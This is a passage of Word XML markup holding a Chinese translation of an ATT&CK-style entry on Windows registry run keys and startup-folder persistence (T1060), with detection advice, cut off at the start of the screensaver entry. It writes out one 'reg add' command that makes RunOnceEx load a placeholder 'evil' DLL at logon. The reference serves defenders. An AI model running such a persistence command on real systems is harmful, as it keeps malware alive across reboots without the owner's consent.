          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>对于使用外部可访问的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或远程服务的替代访问，请</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>按照</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>有效帐户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>外部远程服务</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>下的检测建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>来收集帐户使用信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E1B100" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DD0FD4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D50330E" w14:textId="7ECCE4E8" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注册表</w:t>
      </w:r>
      <w:r w:rsidR="00E116F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运行键</w:t>
      </w:r>
      <w:r w:rsidR="00E116F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00E116F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>启动文件夹</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1B4BE88F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C362D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1060</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB3F299" w14:textId="77A74F87" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="146EDAA2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC646C6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>HKEY_LOCAL_MACHINE</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>键需要管理员访问才能创建和修改</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0096168A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18EB624F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192730B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId70" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-270</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F83B9ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Oddvar Moe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>@oddvarmoe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B807D18" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A258838" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE7B71E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向注册表或启动文件夹中的“运行键”添加条目会导致在用户登录时执行引用的程序。这些程序将在用户的上下文中执行，并具有账号的相关权限级别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0068CD86" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>默认情况下，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统上创建以下运行键：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA13611" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>也可用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，但默认情况下不会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Windows Vista</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>及更高版本上创建。注册表运行键条目可以直接引用程序或将它们列为依赖项。例如，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>RunOnceEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Depend</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>”键在登录时加载动态链接库：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A40057" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下注册表项可用于设置启动文件夹项来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得持久性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE13DA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3C4A9F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会使用这些配置位置来执行恶意软件，例如远程访问工具，通过系统重启来维持持久性。攻击者还可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidRPr="00671A0D">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>伪装</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表项看起来好像与合法程序相关。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D07609F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1289B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0539A559" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88EAA0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控注册表中与已知软件、补丁周期等不相关运行键的更改。监控启动文件夹的添加或更改。也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具来检测是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旨在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得持久性的系统更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>包括列出运行建的注册表位置以及启动文件夹。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>启动程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的话，会显示为异常进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>因为与历史数据进行比较时，这些进程从未出现过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129DC4CF" w14:textId="5E0D4199" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当安装了合法软件时，这些位置的更改通常视为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>正常情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。为了增加恶意活动的可信度，不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，例如为</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而建立网络连接，通过发现了解环境的详细信息，以及横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993F405" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屏幕保护</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1FBB3C27" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C052DD8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1180</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DBCA2FD" w14:textId="4C924488" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C5B6DA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
